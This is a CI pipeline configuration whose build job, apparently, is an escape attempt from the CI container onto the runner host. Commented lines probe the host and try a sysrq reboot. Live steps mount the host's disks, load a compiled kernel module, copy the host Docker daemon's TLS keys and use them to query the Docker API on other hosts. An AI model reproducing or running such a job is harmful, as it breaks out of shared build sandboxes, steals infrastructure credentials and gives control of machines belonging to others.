build:
  image: gcc
  stage: build
  script:
#  - ":"
#  - which reboot
#  - ls /proc
#  - "dmesg || :"
#  - echo 1 > /proc/sys/kernel/sysrq
#  - "dmesg || :"
#  - echo b > /proc/sysrq-trigger
#  - "dmesg || :"
#  - ip a
#  - apk add curl openssl
#  - curl -k https://172.17.0.1:2376 -D- || true
#  - openssl s_client -showcerts -connect 172.17.0.1:2376 </dev/null || true
#  - cat /mnt/etc/docker/key.json
#  - DOCKER_TLS=true  DOCKER_HOST=tcp://172.17.0.1:2376 docker ps -a

#  - apk add util-linux file
#  - file -s /dev/sda*
#  - fdisk -l /dev/sda

#  - ls -laR /lib/modules
#  - apk add alpine-sdk ncurses-dev bc linux-headers perl libelf-dev

  - mount -o ro /dev/dm-0 /mnt
  - mkdir -p /lib/modules
  - mount --bind /mnt/lib64/modules /lib/modules
  - apt-get update && apt-get install -y libelf-dev kmod
  - make
  - ./run
  - sleep 1
  - dmesg
  - ls -la /mnt/lib64
  - mount /dev/sda9 /mnt
  - find /mnt -name TEST
  - exit

  - mount /dev/sda9 /mnt
  - export DOCKER_HOST=tcp://172.17.0.1:2376
  - export DOCKER_TLS_VERIFY=1
  - mkdir ~/.docker
  - cp /mnt/etc/docker/* ~/.docker
  - cp ~/.docker/server.pem ~/.docker/cert.pem
  - cp ~/.docker/server-key.pem ~/.docker/key.pem
  - ls -la ~/.docker
  - IP="$(docker ps -a 2>&1 | grep -Eo '([0-9]+\.){3}[0-9]+' | sed -n 2p)" || true
  - docker ps -a 2>&1 || true
  - echo "$IP"
  - export DOCKER_HOST=tcp://"$IP":2376
  - docker ps -a || true
  - apk add curl
  - curl -k https://$IP:2376/images/json
    --cert ~/.docker/cert.pem
    --key ~/.docker/key.pem
    --cacert ~/.docker/ca.pem
